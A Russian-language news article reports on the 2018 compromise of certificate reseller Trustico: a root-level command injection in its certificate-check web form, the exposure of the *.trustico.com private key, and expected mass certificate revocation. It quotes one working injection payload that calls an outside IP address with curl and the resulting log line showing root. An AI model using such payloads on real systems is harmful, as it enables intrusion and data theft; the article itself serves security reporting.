Ожидается отзыв всех остальных сертификатов Trustico из-за полной компрометации сервера

Вчерашняя история с отзывом 23 тысяч сертификатов, выданных через реселлера Trustico, получала неожиданное продолжение. Один из исследователей безопасности раскрыл тривиальную уязвимость в web-интерфейсе, позволяющую получить root-доступ на сервер.

Проблема свидетельствует о наплевательском отношении к безопасности и косвенно подтверждает, что действия Trustico по отзыву сертификатов были связаны с инцидентом с безопасностью, несмотря на то, что компания отвергала подобные предположения. По информации от исследователя, продемонстрировавшего уязвимость, о проблеме было известно ранее и он почерпнул сведения из публичных источников. Суть выявленной уязвимости в передаче пользовательского ввода в обработчик на shell без экранирования спецсимволов. В частности, если ввести shell-операторы в поле ввода домена в форме проверки корректности установки сертификата, то они будут исполнены на сервере с правами root.

Например, при вводе вместо имени проверяемого домена строки «$(curl http://1.2.3.4/`id`)» на хост 1.2.3.4 придёт запрос вида: 

   1.2.3.4 - [02/Mar/2018:09:52:14] "GET /uid=0(root) HTTP/1.1" 404 209 "-" "curl/7.29.0"

В настоящее время сайт Trustico выведен из строя и недоступен. Пока непонятно позволял ли взломанный сервер получить доступ к архиву закрытых ключей клиентских сертификатов, но до выключения сервера одному из экспериментаторов удалось найти в конфигурации web-сервера закрытый ключ для SSL-сертификта домена «*.trustico.com», который хранился на скомпрометированном сервере.

Проблема также затронула партнёрский сайт SSLDirect.com, который размещался на том же сервере, и генерировал сертификаты через Trustico, характеризуя данную компанию как одного из ведущих мировых центров сертификации («Trustico is one of the worlds leading SSL Certificate issuers»).

Представители удостоверяющих центров DigiCert и Comodo, которые выступали в роли партнёров Trustico, пока никак не отреагировали на проблему, но в соответствии с правилами можно ожидать отзыва всех выданных через Trustico сертификатов в течение 24 часов.
При этом представители Trustico заявили, что скомпрометированный сервер не имел доступа к информационным базам, в которых хранились данные клиентов.

Добавить комментарий

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Этот сайт использует Akismet для борьбы со спамом. Узнайте, как обрабатываются ваши данные комментариев.